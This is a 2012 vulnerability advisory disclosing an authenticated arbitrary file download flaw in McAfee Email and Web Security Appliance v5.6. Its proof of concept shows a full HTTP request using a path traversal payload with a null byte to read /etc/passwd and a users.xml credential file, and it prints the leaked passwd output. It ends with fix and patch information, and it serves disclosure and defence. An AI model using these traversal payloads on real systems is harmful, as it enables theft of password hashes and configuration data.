Verder naar navigatie Doorgaan naar hoofdinhoud Ga naar de voettekst

McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is possible with a crafted URL, when logged in as any user

Summary

Name: McAfee Email and Web Security Appliance v5.6 – Arbitrary file
download is possible with a crafted URL, when logged in as any user
Release Date: 30 November 2012
Reference: NGS00158
Discoverer: Ben Williams 
Vendor: McAfee
Vendor Reference:
Systems Affected:
Risk: Medium
Status: Published

TimeLine

Discovered: 26 November 2011
Released: 29 November 2011
Approved: 29 November 2011
Reported:  4 December 2011
Fixed: 13 March 2012
Published: 30 November 2012

Description

McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is
possible with a crafted URL, when logged in as any user

McAfee Email and Web Security Appliance v5.6 (v5.6 1741.115) is prone to
arbitrary file download with a crafted URL, by any authenticated user

The exploit would enable an attacker to:

 – Having gained access to the UI, an attacker can download arbitrary files
from the appliance
 – This exploit has the file permissions of the Apache users

Technical Details

I. VULNERABILITY

McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is
possible with a crafted URL, when logged in as any user

II. BACKGROUND

McAfee (Owned by Intel) is one of the worlds best known providers of IT
security products.

The McAfee Email and Web Security Appliance provides security for Email and
Web protocols, and acts as a Firewall and Gateway solution.

http://www.mcafee.com/

III. DESCRIPTION

McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is
possible with a crafted URL, when logged in as any user

IV. PROOF OF CONCEPT

Arbitrary file download is possible with a crafted URL, when logged in as
any user.
(even a low-privileged “report user” can do this)

This is a simple get request (the filename downloaded is changed to
“backup” but it appears possible to download any file that the apache user
could access).

Various sensitive files can be recovered, such as files containing users
password hashes and application or operating system configuration files.
https://192.168.233.40/scmadmin/19320/cgi-bin/handle_download/backup?command=../../../config/wsxmlconf/wsadmin/users.xml%00

GET
/scmadmin/19320/cgi-bin/handle_download/backup?command=../../../etc/passwd%00
HTTP/1.1
Host: 192.168.233.40
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:7.0.1)
Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://192.168.233.40/scmadmin/19320/en_US/html/SysAdmin.html
Cookie:
SCMUserSettings=%3Dnull%26popcheck%3D1%26lastUser%3Dscmadmin%26lang%3Den_US%26last_page_id%3Dmessage_search;
SHOW_BANNER_NOTICE=BannerShown%3D1;
ws_session=SID%3DSID%3A04367A5D-0C6C-4B6E-B673-7DFD53E73157

HTTP/1.1 200 OK
Date: Sat, 26 Nov 2011 19:40:54 GMT
Server: Apache/2.0.63 (Unix)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/zip;
Content-Length: 763

Copyright (C) 2007 McAfee Inc. All rights reserved.
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
mail:x:8:12:mail:/var/spool/mail:
uucp:x:10:14:uucp:/:
nobody:x:99:99:Nobody:/:
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
support:x:500:500:Support Account:/home/support:/opt/NETAwss/mgmt/mash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/opt/NETAwss/ui/www:/sbin/nologin

Fix Information

Proper sanitation of user supplied data (not just reliance on the “Perl
-wT” options, as these don’t always work)

Update to Email and Web Security 5.5 Patch 6, Email and Web Security 5.6
Patch 3, McAfee Email Gateway 7.0 Patch 1